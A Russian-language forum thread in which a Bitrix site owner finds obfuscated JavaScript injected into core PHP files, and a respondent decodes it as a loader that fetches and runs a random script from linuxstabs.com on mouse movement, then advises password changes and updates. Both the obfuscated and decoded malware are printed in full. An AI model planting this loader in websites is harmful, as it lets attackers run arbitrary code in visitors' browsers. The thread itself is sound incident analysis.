# Заражение сайта?

Tags: javascript

Добрый день, уважаемые господа!

Имею сайт, cms Bitrix. Сегодня при логине cmsка начала орать:
Внимание! Обнаружены лишние символы в служебном файле: /home/invord/invord.ru/docs/bitrix/modules/main/classes/mysql/main.php, строка 346.

Нашел, вырезал, все работает стабильно. Не сильно понимаю что это, выложу сюда, закрою в потоковый. Может скажете, что за хрень?
Благодарю!

```
<script type="text/javascript">
var _0x5cb4=["\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x69\x6E\x75\x78\x73\x74\x61\x62\x73\x2E\x63\x6F\x6D\x2F","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x72\x61\x6E\x64\x6F\x6D","\x2E\x6A\x73","\x6F\x6E\x6D\x6F\x75\x73\x65\x6D\x6F\x76\x65","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x63\x6F\x6D\x70\x6C\x65\x74\x65","\x6F\x6E\x6C\x6F\x61\x64","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];(function (){var _0x8dacx1=_0x5cb4[0]+Math[_0x5cb4[2]]().toString()[_0x5cb4[1]](3)+_0x5cb4[3];var _0x8dacx2=0;document[_0x5cb4[4]]=function (){if(_0x8dacx2===0){_0x8dacx2=1;var _0x8dacx3=document[_0x5cb4[6]](_0x5cb4[5])[0];var _0x8dacx4=document[_0x5cb4[8]](_0x5cb4[7]);_0x8dacx4[_0x5cb4[9]]=_0x5cb4[10];_0x8dacx4[_0x5cb4[11]]=function (){if(this[_0x5cb4[12]]==_0x5cb4[13]){_0x8dacx2=2;} ;} ;_0x8dacx4[_0x5cb4[14]]=function (){_0x8dacx2=2;} ;_0x8dacx4[_0x5cb4[15]]=_0x8dacx1;_0x8dacx3[_0x5cb4[16]](_0x8dacx4);} ;} ;} )();
</script>
```

Comment: эмм... код не приложился....

Comment: Поправьте оригинальное сообщение, выделите код и нажмите на значок 101010 . Если и так не получиться, дате ссылку на pastbin

Comment: сделано.
Не подскажите что за пакость? Имею массовое заражение, из трех файлов уже удалил, сейчас на четвертый ругается. Все *.php

Answer (score 4):

Это хак, я думаю, что вот так будет понятнее:

```
(function () {
    var file = 'http://linuxstabs.com/' + Math.random().toString().substring(3) + '.js';
    var state = 0;
    document.onmousemove = function () {
        if (state === 0) {
            state = 1;
            var headObj = document.getElementsByTagName('head')[0];
            var scriptObj = document.createElement('script');
            scriptObj.type = 'text/javascript';
            scriptObj.onreadystatechange = function () {
                if (this.readyState == 'complete') {
                    state = 2;
                };
            };
            scriptObj.onload = function () {
                state = 2;
            };
            scriptObj.src = file;
            headObj.appendChild(scriptObj);
        };
    };
})();
```

http://linuxstabs.com/[ЛЮБЫЕ 3 ЦИФРЫ].js
Отдает js-код, который может делать что угодно
Другими словами, смените пароли и обновите bitrix.

Comment: Благодарю Вас, сэр!
Я эту пакость из всех файлов потер, больше не ругается, пароли обновил. Стоит ли обновлять Bitrix?

Comment: Стоит обновлять, т.к. насколько я знаю в старых версиях были дырки. Можно поискать в гугле. Поменяйте пароли от ftp, ssh и т.д., а не только от админки.

Comment: И если можно - чуть подробнее про цель хака? Перехват управления? Размещение pop`апов?
Просто хочу понять это целенаправленное действие против компании или просто паразит какой то.

Comment: Скорее tds'ка, т.е. воруют трафик. Вряд ли против компании.